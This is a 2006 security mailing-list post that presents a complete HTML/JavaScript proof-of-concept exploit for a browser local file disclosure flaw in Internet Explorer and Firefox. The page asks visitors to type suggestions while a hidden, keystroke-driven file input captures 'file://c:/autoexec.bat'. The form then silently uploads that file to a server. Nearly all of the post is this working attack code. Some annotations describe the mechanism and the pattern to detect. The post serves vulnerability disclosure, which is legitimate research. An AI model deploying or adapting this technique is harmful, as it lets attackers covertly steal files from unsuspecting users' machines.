Vulnerability Development mailing list archives
InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)
From: sirdarckcat () gmail com
Date: 11 Jun 2006 09:37:33 -0000
This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here: http://www.techweb.com/showArticle.jhtml?articleID=188702202 and reported by Symantec. The subjects of the links sugested, are for forcing the user to input: FILE AUTOEXEC BAT so we can receive: file://c:/autoexec.bat and upload this file to a server. This is a low risk vulnerability.
//--START HTML CODE--//
<html>
<body>
<!-- Visible form: only the textarea is shown to the visitor. The list of
     subjects is the lure described in the post above. -->
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<!-- File input that starts disabled, hidden and sized 1x1; the script below
     toggles it while the visitor types. -->
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
 * OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
 * by sirdarckcat [at] gmail [.] com
 * from: elhacker.net
 *
 * Reading notes: the handlers below watch document-level key events and,
 * when a key matches the next expected entry, move focus from the textarea
 * to the hidden file input. Per the post, the aim is for the visitor's own
 * keystrokes to spell the path held in `thefilew`.
 * The technique depends on a file input accepting typed text; a browser
 * that only takes the path from its native file-picker dialog is presumably
 * not affected.
 * For review/detection: a key handler that enables and focuses a hidden
 * <input type=file> and then restores focus elsewhere is the distinguishing
 * pattern in this listing.
 **/

// Per-position flag: non-zero means Shift has to be held for that position
// to count as a match (see the condition in checa). Same length as thefilek.
var nidshift = new Array(0 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0);
// Per-position key code that checa compares the pressed key against.
// NOTE(review): the codes look layout-dependent (e.g. 190 used for both a
// shifted and an unshifted position) - confirm against the intended keyboard.
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,65,84);
// Target string; one character per entry of thefilek / nidshift.
var thefilew = "file://c:/autoexec.bat";
// Index of the next expected position in the three sequences above.
var dv = 0;
// Tracks whether Shift (key code 16) is currently considered held.
var chift = false;
// teo: the hidden file input; feo: the visible textarea.
var teo = document.forms[0].thet;
var feo = document.forms[0].other;

/**
 * keydown handler. Advances through the expected key sequence and switches
 * focus between the textarea and the file input accordingly.
 *
 * @param tecla key event object; falls back to the global `event` keyCode
 *              when `tecla.which` is falsy.
 */
function checa(tecla) {
    var rt=(tecla.which)?tecla.which:event.keyCode;
    // lw is computed but never read anywhere in this listing.
    var lw=String.fromCharCode(rt);
    // Once every position has been matched, the next keydown submits the form.
    if (dv>=thefilew.length){
        document.forms[0].submit();
    }
    if (rt == 16){
        chift = true;
    }
    if (rt==thefilek[dv]){
        // Key matches; it only counts if the Shift state agrees with nidshift.
        // When the Shift state disagrees, nothing is changed for this event.
        if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
            // Reveal and focus the file input during keydown - presumably so
            // the character produced by this keystroke is delivered to it.
            teo.disabled=false;
            teo.style.visibility="visible";
            teo.focus();
            // Append the same character to the textarea by script, so the
            // textarea content still reflects what was typed.
            feo.value += thefilew[dv];
            dv++;
        }
    }else{
        // Any other key: return focus to the textarea and hide the file input.
        // dv is not reset here, so progress made so far is kept.
        feo.focus();
        teo.disabled=true;
        teo.style.visibility="hidden";
    }
}

/**
 * keyup handler: clears the Shift flag when Shift (key code 16) is released.
 */
function solsh(tecla){
    var rt=(tecla.which)?tecla.which:event.keyCode;
    if (rt == 16){
        chift = false;
    }
}

/**
 * keypress handler: sets the Shift flag when the reported code is 16.
 */
function mprss(tecla){
    var rt=(tecla.which)?tecla.which:event.keyCode;
    if (rt == 16){
        chift = true;
    }
}

// Handlers are installed on the whole document, not on a single field.
document.onkeydown = checa;
document.onkeyup = solsh;
document.onkeypress= mprss;
</script>
</body>
</html>
//--END HTML CODE--//
Att. Sirdarckcat www.elhacker.net